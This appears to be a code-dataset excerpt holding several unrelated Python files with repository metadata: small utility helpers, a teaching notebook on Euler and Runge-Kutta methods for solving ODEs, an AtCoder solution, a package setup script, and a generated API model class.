class catch_exceptions(t.Generic[_T_co], object):
def __init__(
self,
catch_exc: t.Union[t.Type[BaseException], t.Tuple[t.Type[BaseException], ...]],
throw_exc: t.Callable[[str], BaseException],
msg: str = "",
fallback: t.Optional[_T_co] = None,
raises: t.Optional[bool] = True,
) -> None:
self._catch_exc = catch_exc
self._throw_exc = throw_exc
self._msg = msg
self._fallback = fallback
self._raises = raises
# TODO: use ParamSpec (3.10+): https://github.com/python/mypy/issues/8645
def __call__( # noqa: F811
self, func: t.Callable[..., _T_co]
) -> t.Callable[..., t.Optional[_T_co]]:
@functools.wraps(func)
def _(*args: t.Any, **kwargs: t.Any) -> t.Optional[_T_co]:
try:
return func(*args, **kwargs)
except self._catch_exc:
if self._raises:
raise self._throw_exc(self._msg)
return self._fallback
return _
@contextlib.contextmanager
def reserve_free_port(host: str = "localhost") -> t.Iterator[int]:
"""
detect free port and reserve until exit the context
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((host, 0))
port = sock.getsockname()[1]
yield port
sock.close()
def copy_file_to_fs_folder(
src_path: str,
dst_fs: "FS",
dst_folder_path: str = ".",
dst_filename: t.Optional[str] = None,
):
"""Copy the given file at src_path to dst_fs filesystem, under its dst_folder_path
folder with dst_filename as file name. When dst_filename is None, keep the original
file name.
"""
src_path = os.path.realpath(os.path.expanduser(src_path))
dir_name, file_name = os.path.split(src_path)
src_fs = fs.open_fs(dir_name)
dst_filename = file_name if dst_filename is None else dst_filename
dst_path = fs.path.join(dst_folder_path, dst_filename)
fs.copy.copy_file(src_fs, file_name, dst_fs, dst_path)
def resolve_user_filepath(filepath: str, ctx: t.Optional[str]) -> str:
"""Resolve the abspath of a filepath provided by user, which may contain "~" or may
be a relative path base on ctx dir.
"""
# Return if filepath exist after expanduser
_path = os.path.expanduser(filepath)
if os.path.exists(_path):
return os.path.realpath(_path)
# Try finding file in ctx if provided
if ctx:
_path = os.path.expanduser(os.path.join(ctx, filepath))
if os.path.exists(_path):
return os.path.realpath(_path)
raise FileNotFoundError(f"file {filepath} not found")
class cached_property(t.Generic[C, T]):
"""A property that is only computed once per instance and then replaces
itself with an ordinary attribute. Deleting the attribute resets the
property.
"""
def __init__(self, func: t.Callable[[C], T]):
try:
functools.update_wrapper(self, func)
except AttributeError:
pass
self.func = func
# pylint: disable=attribute-defined-outside-init
def __set_name__(self, owner, name):
self.name = name
def __get__(self, obj: C, cls: t.Type[C]) -> T:
if obj is None:
raise AttributeError(f"'{cls}' has no member '{self.name}'")
value = obj.__dict__[self.name] = self.func(obj)
return value
VT = t.TypeVar("VT")
class cached_contextmanager:
"""
Just like contextlib.contextmanager, but will cache the yield value for the same
arguments. When one instance of the contextmanager exits, the cache value will
also be poped.
Example Usage:
(To reuse the container based on the same image)
>>> @cached_contextmanager("{docker_image.id}")
>>> def start_docker_container_from_image(docker_image, timeout=60):
>>> container = ...
>>> yield container
>>> container.stop()
"""
def __init__(self, cache_key_template: t.Optional[str] = None):
self._cache_key_template = cache_key_template
self._cache: t.Dict[t.Any, t.Any] = {}
def __call__(
self,
func: t.Callable[..., t.Generator[VT, None, None]],
) -> t.Callable[..., t.ContextManager[VT]]:
func_m = contextlib.contextmanager(func)
@contextlib.contextmanager
@functools.wraps(func)
def _func(*args: t.Any, **kwargs: t.Any) -> t.Any:
import inspect
bound_args = inspect.signature(func).bind(*args, **kwargs)
bound_args.apply_defaults()
if self._cache_key_template:
cache_key = self._cache_key_template.format(**bound_args.arguments)
else:
cache_key = repr(tuple(bound_args.arguments.values()))
if cache_key in self._cache:
yield self._cache[cache_key]
else:
with func_m(*args, **kwargs) as value:
self._cache[cache_key] = value
yield value
self._cache.pop(cache_key)
return _func
| 30.191589
| 87
| 0.624207
|
4a1462c71ab690ff4a41846d739b53cb53fe3932
| 18,883
|
py
|
Python
|
_build/jupyter_execute/courseware/Chapter_6/ODEs.py
|
saturnaxis/PHYS3820_Book
|
e6ead8c5353c7cfacba58376d259f6c3a11b0b3a
|
[
"MIT"
] | null | null | null |
_build/jupyter_execute/courseware/Chapter_6/ODEs.py
|
saturnaxis/PHYS3820_Book
|
e6ead8c5353c7cfacba58376d259f6c3a11b0b3a
|
[
"MIT"
] | null | null | null |
_build/jupyter_execute/courseware/Chapter_6/ODEs.py
|
saturnaxis/PHYS3820_Book
|
e6ead8c5353c7cfacba58376d259f6c3a11b0b3a
|
[
"MIT"
] | 1
|
2022-01-17T23:19:38.000Z
|
2022-01-17T23:19:38.000Z
|
#!/usr/bin/env python
# coding: utf-8
# # Ordinary Differential Equations (ODEs)
# If you give an object (e.g., large wooden rabbit) some initial velcoity $v$ over a castle wall, then you will note that the vertical component of velcoity gradually decreases. Eventually, the vertical velocity component changes direction and the object (or wooden rabbit) impacts the ground with a speed roughly equal to the speed it had when it left.
#
# This example probably reminds you of the kinematics that you learned in your introductory physics course. Resurrecting that prior knowledge wil assist you to develop intuitions to setup and solve ordinary differential equations (ODEs) numerically. Through kinematics, we define an acceleration $a$ as:
#
# $a = \frac{dv}{dt}$ or $dv = a dt$ (with finite steps $d \rightarrow \Delta$).
#
# However, we can perform a [Galilean transformation](https://en.wikipedia.org/wiki/Galilean_transformation) to make this result more general, which incorporates the initial velocity $v_o$ and then we can estimate the new velocity (given that we can calculate $a$). Mathematically, this is:
#
# $v = v_o + a\Delta t$.
#
# Eventually, we'll want to change this into code. This is much easier if we write the above equation as a [recurrence relation](https://en.wikipedia.org/wiki/Recurrence_relation), where the next value can be determined by the previous one:
#
# $v_{i+1} = v_i + \frac{dv}{dt}\Delta t$.
#
# We can use an identical process to estimate the position of the projectile along a direction $x$ and using the definition $v = dx/dt$:
#
# $x_{i+1} = x_i + \frac{dx}{dt}\Delta t$.
#
# This method does not give an exact result with large $\Delta t$, but for small enough $\Delta t$ it's close. We can generalize further to define a state **$y$**$=[x,v]$ and use a single relation as:
#
# $y_{i+1} = [x_i,v_i] + \frac{d}{dt}[x_i,v_i]\Delta t$.
# ## Euler's method
# The method we've described is called *Euler's method* and it is a good first step in solving ODEs. Let's consider a picture of how it works. Starting from an initial point (t_o,x_o), we estimate the slope of $x(t)$ between the current point and a time step $\Delta t$ forward to find the approximate value of $x_1$. Because we used a recurrence relation, these steps can be repeated to find each step $x_i$ in the seris of $x_n$.
#
# The error through Euler's method can be large, but you can reduce the error introduced in the approximation by decreasing the time step $\Delta t$. Essentially, you are decreasing the interval for the function $x(t)$ until it becomes approximately linear. To determine the sensitivity of Euler's method relative to the step size $\Delta t$, we perform a Taylor expansion of $x(t)$ as:
#
# $x(t+\Delta t) = x(t) + \frac{dx}{dt}\Delta t + \frac{d^2x}{dt^2}\frac{\Delta t^2}{2} + \cdots$.
#
# The first two terms on the right hand side are Euler's method and the error in each step is on the order of $\Delta t^2$, since that's the first term omitted in the Taylor series expansion. However you accumulate error over the full time interval $\tau$ with the number of steps $N = \tau/\Delta t$, which changes the total error to $\Delta t$. Notice that decreasing the step size $\Delta t$ improves your result linearly and Euler's method only works on first-order differential equations. This means that if we can re-cast higher order differential equations into a series of first-order differential equations, then we have a very general method.
#
# For example, let's explore the case of a mass on a spring. The force of a spring is $F_{spr} = ma = -kx$, where $k$ is a spring constant and $m$ is the mass. This is a second-order ODE, but we can re-write the equations like in the introductory section with the Galilean transformation. This involves a new variable $v = dx/dt$. We have the following:
#
# $a = -\frac{k}{m}x$ (original),
#
# which can be transformed as two coupled first-order differential equations
#
# $\frac{dx}{dt} = v$
#
# and
#
# $\frac{dv}{dt} = -\frac{k}{m}x$.
# ## Standard Method for Solving ODEs
# Here we develop a *standard model* for solving ODEs, which will be a blueprint for using different algorithms that have been developed. This way it takes only a minimum amount of reprogramming to change between algorithms. To start, consider the differential equation for a large wooden rabbit in free-fall with the *English pig-dogs* as the intended target:
#
# $\ddot{x} = \frac{d^2}{dt^2} = -g$,
#
# where we've introduce the *dot* notation to make things a little easier when writing time derivatives and the above equation can be broken into two first-order equations:
#
# $\dot{x} = \frac{dx}{dt} = v$
#
# and
#
# $\dot{v} = \frac{dv}{dt} = -g$.
#
# The individual Eular solutions to those first-order equations are:
#
# $x_{i+1} = x_i + \dot{x}\Delta t$
#
# and
#
# $v_{i+1} = v_i + \dot{v}\Delta t$.
#
# There is a symmetry (which will help in producing code later) that lets you write them as a single vector equation:
#
# $y_{i+1} = y_i + \dot{y}\Delta t$,
#
# where $y = [x,v]$ and $\dot{y} = [v,-g]$. By writing the equations as vectors, we can better define the problem and change our thinking into one where **states** evolve. Let's turn this into code:
# In[2]:
def deriv_freefall(y,t):
#function to define the derivatives need to solve the problem of free-fall
#y is the current state and holds the variables [x,v] (position and first derivative)
#t is the current time; not really used but kept for consistency
yprime = np.zeros(len(y)) #derivative vector to be returned
yprime[0] = y[1] #store the velocity
yprime[1] = -9.8 #store the acceleration
return yprime
def Euler(y,t,dt,derivs):
#function to implement Euler's method given the
#y = [x,v] current state
#t = current time
#dt = time step
#derivs = derivative function that defines the problem
y_next = y + derivs(y,t)*dt
return y_next
# The above functions include the time $t$ in their arguments, but it is not used in the functions at all. This is on purpose because we want to create a general method, where in some other case the time variable could be more important. Note also that the derivative function we created *deriv_freefall* is specific to the problem at hand, but the *Euler* function is completely general.
# Using our standard method, let's put everything together to solve the mass on a spring problem but vertically. **Will the forces will be different?**
#
# Let's define the problem using code and see what we get:
# In[10]:
#SHO_Euler.py; Simple Harmonic motion (vertical mass on a spring)
import numpy as np
import matplotlib.pyplot as plt
N = 1000 #number of steps to take
y_o = 0. #initial position (spring unstretched)
v_o = 0. #starting at rest
tau = 3. #total time for simulation (in seconds)
h = tau/float(N-1) #time step
k = 3.5 #spring constant (in N/m)
m = 0.2 #mass (in kg)
g = 9.8 #gravity (in m/s^2); new force since the spring is now vertical
states_Euler = np.zeros((N,2)) #storage for each state (used for plotting later)
times = np.arange(0,tau+h,h)
states_Euler[0,:] = [y_o,v_o] #set initial state (for completeness)
def Euler(y,t,h,derivs):
#function to implement Euler's method
#y = [x,v] current state
#t = current time
#h = time step
#derivs = derivative function that defines the problem
y_next = y + derivs(y,t)*h
return y_next
def SHO(x,time):
#Simple Harmonic Oscillator
#x = [y_t,v_t]; t = time (unused)
#2nd order eqn: dy^2/dt^2 = -k/m y - g
yp = np.zeros(2) #initialize return state
yp[0] = x[1] #dy/dt = v_t
yp[1] = -k/m*x[0] - g #dv/dt = -k/m y - g
return yp
for j in range(0,N-1):
#We obtain the j+1 state by feeding the j state to Euler
states_Euler[j+1,:] = Euler(states[j,:],times[j],h,SHO)
#Now let's visualize our results
fig = plt.figure(1,figsize=(6,12))
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(212)
ax1.plot(times,states_Euler[:,0],'r.',ms=10)
ax2.plot(times,states_Euler[:,1],'b.',ms=10)
ax1.set_xlim(0,tau)
ax2.set_xlim(0,tau)
ax1.set_ylabel("y (m)",fontsize=20)
ax2.set_ylabel("$v_y$ (m/s)", fontsize=20)
ax2.set_xlabel("Time (s)",fontsize=20)
# Notice that we defined our time step using the total time and the number of steps. **What do you think will happen we increase the time or decrease the number of steps?** **Will the results be very different?**
#
# ## Runge-Kutta Methods
# The most popular and general techinque of solving ODE's is a set of methods called *Runge-Kutta* or **rk** methods. The Runge-Kutta algorithms for integrating a differential equation are based upon the formal (exact) integral of a differential equation:
#
# $\frac{dy}{dt} = f(t,y) \implies y(t) = \int f(t,y) dt$
#
# $\Rightarrow y_{n+1} = y_n + \displaystyle \int_{t_n}^{t_{n+1}} f(t,y) dt$.
#
# To derive the second-order Runge-Kutta algorithm (**rk2**), we expand $f(t,y)$ in a Taylor series about the *midpoint* of the integration interval and retain two terms:
#
# $f(t,y) \simeq f(t_{n+1/2},y_{n+1/2}) + (t-t_{n+1/2})\frac{df}{dt}(t_{n+1/2}) + O(h^2)$.
#
# Because ($t-t_{n+1/2}$) to any odd power is symmetric (equally positive and negative) over the interval $t_n\leq t \leq t_{n+1}$, the integral of the second term with ($t-t_{n+1/2}$) vanishes and we obtain our algorithm:
#
# $\displaystyle \int_{t_n}^{t_{n+1}} \simeq f(t_{n+1/2},y_{n+1/2})h + O(h^3)$,
#
# $\implies y_{n+1} \simeq y_n + f(t_{n+1/2},y_{n+1/2})h + O(h^3)$ (**rk2**).
#
# We should notice that while **rk2** contains the same number of terms as Euler's rule, it obtains a higher level of precision by taking advantage of the cancelation of the $O(h)$ terms (recall something similar happened when comparing Trapezoid to Simpson's rule). The price for improved precision is having to evaluate the derivative function and $y$ at the middle of the time interval, $t = t_n + h/2$. But, we don't have a function to evaluate at this point! The way out of this quagmire is to ues Euler's algorithm for the midpoint $y_{n+1/2}$:
#
# $y_{n+1/2} \simeq y_n + \frac{h}{2}\frac{dy}{dt}=y_n + \frac{h}{2}f(t_n,y_n)$.
#
# Combining the above expression with our equation for **rk2**, we get:
#
# $y_{n+1} \simeq y_n + k_2$, (**rk2**)
#
# $k_2 = hf(t_n+h/2,y_n+k_1/2),\;\;\;\;k_1 = hf(t_n,y_n)$,
#
# where $y$ is a state vector (and hence $f(t,y)$ is a state vector too). The known derivative function $\frac{dy}{dt} = f(t,y)$ is evaluated at the ends and the midpoint of the interval, but only the known initial value of the $y$ is required. This makes the algorithm self-starting. Just like how we expanded our integration methods to consider more steps, we can do the same with **rk2** to get **rk4**. Here is the algorithm for **rk4**:
#
# $y_{n+1} = y_n + \frac{1}{6}(k_1 + 2k_2 + 2k_3 + k_4)$,
#
# $k_1 = hf(t_n,y_n),\;\;\;\;k_2 = hf(t_n+h/2,y_n+k_1/2)$,
#
# $k_3 = hf(t_n+h/2,y_n+k_2/2),\;\;\;\;k_4 = hf(t_n+h,y_n+k_3)$.
#
# Let's apply this to our previous problem of the mass on a spring in code!
# In[19]:
#SHO_rk4.py; Simple Harmonic motion (vertical mass on a spring)
import numpy as np
import matplotlib.pyplot as plt
N = 1000 #number of steps to take
y_o = 0. #initial position (spring unstretched)
v_o = 0. #starting at rest
tau = 3. #total time for simulation (in seconds)
h = tau/float(N-1) #time step
k = 3.5 #spring constant (in N/m)
m = 0.2 #mass (in kg)
g = 9.8 #gravity (in m/s^2); new force since the spring is now vertical
states_rk4 = np.zeros((N,2)) #storage for each state (used for plotting later)
times = np.arange(0,tau+h,h)
states_rk4[0,:] = [y_o,v_o] #set initial state (for completeness)
def rk4(y,t,h,derivs):
#function to implement rk4
#y = [x,v] current state
#t = current time
#h = time step
#derivs = derivative function that defines the problem
k1,k2,k3,k4 = np.zeros(2),np.zeros(2),np.zeros(2),np.zeros(2)
k1 = h*derivs(y,t)
y_halfstep = y + k1/2. #Euler half step using k1
k2 = h*derivs(y_halfstep,t+h/2)
y_halfstep = y + k2/2. #Euler half step using k2
k3 = h*derivs(y_halfstep,t+h/2)
k4 = h*derivs(y + k3,t+h) #full step using k3
y_next = y + (k1+2*k2+2*k3+k4)/6.
return y_next
def SHO(x,time):
#Simple Harmonic Oscillator
#x = [y_t,v_t]; t = time (unused)
#2nd order eqn: dy^2/dt^2 = -k/m y - g
yp = np.zeros(2) #initialize return state
yp[0] = x[1] #dy/dt = v_t
yp[1] = -k/m*x[0] - g #dv/dt = -k/m y - g
return yp
for j in range(0,N-1):
#We obtain the j+1 state by feeding the j state to rk4
states_rk4[j+1,:] = rk4(states_rk4[j,:],times[j],h,SHO)
#Now let's visualize our results
fig = plt.figure(1,figsize=(6,12))
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(212)
ax1.plot(times,states_rk4[:,0]-states_Euler[:,0],'r.',ms=10)
ax2.plot(times,states_rk4[:,1]-states_Euler[:,1],'b.',ms=10)
#ax1.plot(times,states_rk4[:,0],'r.',ms=10)
#ax2.plot(times,states_rk4[:,1],'b.',ms=10)
ax1.set_xlim(0,tau)
ax2.set_xlim(0,tau)
ax1.set_ylabel("y (m)",fontsize=20)
ax2.set_ylabel("$v_y$ (m/s)", fontsize=20)
ax2.set_xlabel("Time (s)",fontsize=20)
# The above plots show the differences between **Euler** and **rk4**, where the solutions for the position are virtually identical, but the differences in velocity are more substantial. The **rk4** is the more accurate and versatile of the two methods. There are high-order methods with adaptive step sizes, which you can find in [scipy.integrate](https://docs.scipy.org/doc/scipy/reference/integrate.html). Here is an example function
#
# scipy.integrate.RK45(fun, t0, y0, t_bound=tau, max_step=h, rtol=0.001, atol=1e-06),
#
# where fun defines the derivative function (SHO in our case), t0 is the initial time, y0 is the initial **state**, t_bound is the final time, max_step is the maximum step size that we limit to h, rtol is a relative error tolerance level, and atol is the absolute error tolerance level.
#
# Let's evaluate a more difficult problem using the mass on a spring, where we include a friction coefficient.
# In[37]:
#SHO_rk4_friction.py; Simple Harmonic motion (vertical mass on a spring)
import numpy as np
import matplotlib.pyplot as plt
N = 1000 #number of steps to take
y_o = 0.2 #initial position (spring unstretched)
v_o = 0. #starting at rest
tau = 3. #total time for simulation (in seconds)
h = tau/float(N-1) #time step
k = 42 #spring constant (in N/m)
m = 0.25 #mass (in kg)
g = 9.8 #gravity (in m/s^2); new force since the spring is now vertical
mu = 0.15 #coefficient of friction
states_rk4_fric = np.zeros((N,2)) #storage for each state (used for plotting later)
times = np.arange(0,tau+h,h)
states_rk4_fric[0,:] = [y_o,v_o] #set initial state (for completeness)
def rk4(y,t,h,derivs):
#function to implement rk4
#y = [x,v] current state
#t = current time
#h = time step
#derivs = derivative function that defines the problem
k1,k2,k3,k4 = np.zeros(2),np.zeros(2),np.zeros(2),np.zeros(2)
k1 = h*derivs(y,t)
y_halfstep = y + k1/2. #Euler half step using k1
k2 = h*derivs(y_halfstep,t+h/2)
y_halfstep = y + k2/2. #Euler half step using k2
k3 = h*derivs(y_halfstep,t+h/2)
k4 = h*derivs(y + k3,t+h) #full step using k3
y_next = y + (k1+2*k2+2*k3+k4)/6.
return y_next
def SHO(x,time):
#Simple Harmonic Oscillator
#x = [y_t,v_t]; t = time (unused)
#2nd order eqn: dy^2/dt^2 = -k/m y - g
yp = np.zeros(2) #initialize return state
yp[0] = x[1] #dy/dt = v_t
if yp[0] > 0: #check if velocity is positive
yp[1] = -k/m*x[0] - g*mu #dv/dt = -k/m y - g mu; w/friction
else: #check if velocity is positive
yp[1] = -k/m*x[0] + g*mu #dv/dt = -k/m y + g mu; w/friction
return yp
for j in range(0,N-1):
#We obtain the j+1 state by feeding the j state to rk4
states_rk4_fric[j+1,:] = rk4(states_rk4_fric[j,:],times[j],h,SHO)
#Now let's visualize our results
fig = plt.figure(1,figsize=(6,12))
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(212)
#ax1.plot(times,states_rk4[:,0],'k.',ms=10)
#ax2.plot(times,states_rk4[:,1],'k.',ms=10)
ax1.plot(times,states_rk4_fric[:,0],'r.',ms=10)
ax2.plot(times,states_rk4_fric[:,1],'b.',ms=10)
ax1.set_xlim(0,tau)
ax2.set_xlim(0,tau)
ax1.set_ylabel("y (m)",fontsize=20)
ax2.set_ylabel("$v_y$ (m/s)", fontsize=20)
ax2.set_xlabel("Time (s)",fontsize=20)
# ## Problems
#
# - Complete the following problems in a Jupyter notebook, where you will save your results as an external file (*.png) as needed.
# - Create a LaTex document in RevTex with:
# - an abstract summary
# - sections for each problem that state the problem, summarize what you did, and display the results
# - include a reference for each solution (this can be textbooks)
#
# 1. Express each of these differential equations as a set of [first-order differential equations](https://tutorial.math.lamar.edu/classes/de/systemsde.aspx) and write an appropriate derivs function:
# - $m\ddot{x} = f(x,t)$
# - $A\ddot{x} + B\dot{x} + Cx = D$
# - $m\ddot{\theta} = -\sqrt{g/L}\sin \theta - \beta\dot{\theta}+ \gamma\sin \omega t$
#
# 2. Write a Python program to study projectile motion without air resistance using **rk4**. Then apply your program to the following scenario:
#
# - You are a pirate cannoneer and your Captain (*Jack Sparrow*) has ordered you to fire the cannon to escape the clutches of Davy Jones. Your Captian wants to make a quick getaway because he knows of the stench from the Kraken. Thus, you must make a direct hit on the first shot. The cannon has a muzzle speed of about 400 m/s and the firing deck is 15 m above sea level. The Captain is sailing at max speed, where Davy Jones is matching Sparrow's velocity and keeping a constant 12.2 km between your cannon and his bow. The main mast of the Flying Dutchman is located an additional 25 m beyond the bow.
#
# a. At what angle (from the horizontal) must you fire the cannon to hit the mast of the Flying Dutchman?
#
# b. What is the maximum height (from sea level) will the cannonball fly?
#
# c. Compare your results to expectations from theory (i.e., the kinematics you learned in pirate school). Plot the trajectory (x,y), maximum height, and range determined from your program along with analytic values.
#
# 3. Write a Python program to evaluate the [Lorenz system](https://en.wikipedia.org/wiki/Lorenz_system) using **rk4**. The differential equations are:
# - $\frac{dx}{dt} = \sigma(y-x)$,
# - $\frac{dy}{dt} = x(\rho-z) - y$,
# - $\frac{dz}{dt} = xy - \beta z$.
#
# a. Assume that $\sigma = 10$ and $\beta = 8/3$, but $\rho = [13,14,15,28]$. Evaluate using each value of $\rho$ separately.
#
# b. Plot the z vs. x plane of the above solutions.
| 48.417949
| 655
| 0.685961
|
4a14631e5f521f02169d8596d2af041aa2ce8a68
| 351
|
py
|
Python
|
submissions/abc170/a.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | 1
|
2021-05-10T01:16:28.000Z
|
2021-05-10T01:16:28.000Z
|
submissions/abc170/a.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | 3
|
2021-05-11T06:14:15.000Z
|
2021-06-19T08:18:36.000Z
|
submissions/abc170/a.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | null | null | null |
def main():
import sys
read = sys.stdin.buffer.read
readline = sys.stdin.buffer.readline
readlines = sys.stdin.buffer.readlines
sys.setrecursionlimit(10 ** 7)
x = list(map(int, readline().split()))
for i in range(1, 6):
if i not in x:
print(i)
break
if __name__ == '__main__':
main()
| 20.647059
| 42
| 0.575499
|
4a1464012f7bcfd797cf0bb01e0669ec478a9392
| 820
|
py
|
Python
|
setup.py
|
Configgery/python-configgery-client
|
c5b7b59d21f3165404c1f9f1d978d94a6ea49913
|
[
"MIT"
] | null | null | null |
setup.py
|
Configgery/python-configgery-client
|
c5b7b59d21f3165404c1f9f1d978d94a6ea49913
|
[
"MIT"
] | null | null | null |
setup.py
|
Configgery/python-configgery-client
|
c5b7b59d21f3165404c1f9f1d978d94a6ea49913
|
[
"MIT"
] | 1
|
2022-01-06T00:17:32.000Z
|
2022-01-06T00:17:32.000Z
|
import setuptools
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="configgery-client",
version="1.0.2",
author="Configgery Pty Ltd",
author_email="support@configgery.com",
description="Python client for devices interacting with configgery.com",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/Configgery/configgery-client-python",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
package_dir={"": "src"},
packages=setuptools.find_packages(where="src"),
python_requires=">=3.6",
install_requires=[
"urllib3>=1.21.1"
],
)
| 30.37037
| 76
| 0.662195
|
4a14640746298e15eda12871195d03e1636f3d76
| 9,246
|
py
|
Python
|
build/PureCloudPlatformClientV2/models/contact_list_filter_predicate.py
|
cjohnson-ctl/platform-client-sdk-python
|
38ce53bb8012b66e8a43cc8bd6ff00cf6cc99100
|
[
"MIT"
] | 10
|
2019-02-22T00:27:08.000Z
|
2021-09-12T23:23:44.000Z
|
libs/PureCloudPlatformClientV2/models/contact_list_filter_predicate.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | 5
|
2018-06-07T08:32:00.000Z
|
2021-07-28T17:37:26.000Z
|
libs/PureCloudPlatformClientV2/models/contact_list_filter_predicate.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | 6
|
2020-04-09T17:43:07.000Z
|
2022-02-17T08:48:05.000Z
|
# coding: utf-8
"""
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
import re
import json
from ..utils import sanitize_for_serialization
class ContactListFilterPredicate(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
ContactListFilterPredicate - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'column': 'str',
'column_type': 'str',
'operator': 'str',
'value': 'str',
'range': 'ContactListFilterRange',
'inverted': 'bool'
}
self.attribute_map = {
'column': 'column',
'column_type': 'columnType',
'operator': 'operator',
'value': 'value',
'range': 'range',
'inverted': 'inverted'
}
self._column = None
self._column_type = None
self._operator = None
self._value = None
self._range = None
self._inverted = None
@property
def column(self):
"""
Gets the column of this ContactListFilterPredicate.
Contact list column from the ContactListFilter's contactList.
:return: The column of this ContactListFilterPredicate.
:rtype: str
"""
return self._column
@column.setter
def column(self, column):
"""
Sets the column of this ContactListFilterPredicate.
Contact list column from the ContactListFilter's contactList.
:param column: The column of this ContactListFilterPredicate.
:type: str
"""
self._column = column
@property
def column_type(self):
"""
Gets the column_type of this ContactListFilterPredicate.
The type of data in the contact column.
:return: The column_type of this ContactListFilterPredicate.
:rtype: str
"""
return self._column_type
@column_type.setter
def column_type(self, column_type):
"""
Sets the column_type of this ContactListFilterPredicate.
The type of data in the contact column.
:param column_type: The column_type of this ContactListFilterPredicate.
:type: str
"""
allowed_values = ["numeric", "alphabetic"]
if column_type.lower() not in map(str.lower, allowed_values):
# print("Invalid value for column_type -> " + column_type)
self._column_type = "outdated_sdk_version"
else:
self._column_type = column_type
@property
def operator(self):
"""
Gets the operator of this ContactListFilterPredicate.
The operator for this ContactListFilterPredicate.
:return: The operator of this ContactListFilterPredicate.
:rtype: str
"""
return self._operator
@operator.setter
def operator(self, operator):
"""
Sets the operator of this ContactListFilterPredicate.
The operator for this ContactListFilterPredicate.
:param operator: The operator of this ContactListFilterPredicate.
:type: str
"""
allowed_values = ["EQUALS", "LESS_THAN", "LESS_THAN_EQUALS", "GREATER_THAN", "GREATER_THAN_EQUALS", "CONTAINS", "BEGINS_WITH", "ENDS_WITH", "BEFORE", "AFTER", "BETWEEN", "IN"]
if operator.lower() not in map(str.lower, allowed_values):
# print("Invalid value for operator -> " + operator)
self._operator = "outdated_sdk_version"
else:
self._operator = operator
@property
def value(self):
"""
Gets the value of this ContactListFilterPredicate.
Value with which to compare the contact's data. This could be text, a number, or a relative time. A value for relative time should follow the format PxxDTyyHzzM, where xx, yy, and zz specify the days, hours and minutes. For example, a value of P01DT08H30M corresponds to 1 day, 8 hours, and 30 minutes from now. To specify a time in the past, include a negative sign before each numeric value. For example, a value of P-01DT-08H-30M corresponds to 1 day, 8 hours, and 30 minutes in the past. You can also do things like P01DT00H-30M, which would correspond to 23 hours and 30 minutes from now (1 day - 30 minutes).
:return: The value of this ContactListFilterPredicate.
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""
Sets the value of this ContactListFilterPredicate.
Value with which to compare the contact's data. This could be text, a number, or a relative time. A value for relative time should follow the format PxxDTyyHzzM, where xx, yy, and zz specify the days, hours and minutes. For example, a value of P01DT08H30M corresponds to 1 day, 8 hours, and 30 minutes from now. To specify a time in the past, include a negative sign before each numeric value. For example, a value of P-01DT-08H-30M corresponds to 1 day, 8 hours, and 30 minutes in the past. You can also do things like P01DT00H-30M, which would correspond to 23 hours and 30 minutes from now (1 day - 30 minutes).
:param value: The value of this ContactListFilterPredicate.
:type: str
"""
self._value = value
@property
def range(self):
"""
Gets the range of this ContactListFilterPredicate.
A range of values. Required for operators BETWEEN and IN.
:return: The range of this ContactListFilterPredicate.
:rtype: ContactListFilterRange
"""
return self._range
@range.setter
def range(self, range):
"""
Sets the range of this ContactListFilterPredicate.
A range of values. Required for operators BETWEEN and IN.
:param range: The range of this ContactListFilterPredicate.
:type: ContactListFilterRange
"""
self._range = range
@property
def inverted(self):
"""
Gets the inverted of this ContactListFilterPredicate.
Inverts the result of the predicate (i.e., if the predicate returns true, inverting it will return false).
:return: The inverted of this ContactListFilterPredicate.
:rtype: bool
"""
return self._inverted
@inverted.setter
def inverted(self, inverted):
"""
Sets the inverted of this ContactListFilterPredicate.
Inverts the result of the predicate (i.e., if the predicate returns true, inverting it will return false).
:param inverted: The inverted of this ContactListFilterPredicate.
:type: bool
"""
self._inverted = inverted
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_json(self):
"""
Returns the model as raw JSON
"""
return json.dumps(sanitize_for_serialization(self.to_dict()))
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 34.371747
| 622
| 0.615509
|
